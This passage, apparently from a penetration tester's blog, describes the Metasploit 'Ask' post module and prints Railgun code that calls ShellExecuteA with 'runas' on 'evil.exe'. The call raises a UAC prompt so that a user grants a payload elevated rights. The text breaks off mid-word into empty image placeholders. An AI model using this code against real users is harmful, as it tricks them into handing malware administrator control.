A number of times during tests I’ve actually run into those mythical creatures called “patched windows machines”. At DerbyCon Chris Gates and I released the “Ask” post module (which I had failed to publish). This module very simply uses the ShellExecute windows function.aspx”) via Railgun with the undocumented (but very well known) operator of ‘runas’. These two lines accomplished that:
client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],]) client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5) This would quite simply prompt the user with that annoying UAC prompt asking the user to run ‘evil.![]()
![]()
![]()
![]()
![]()
↧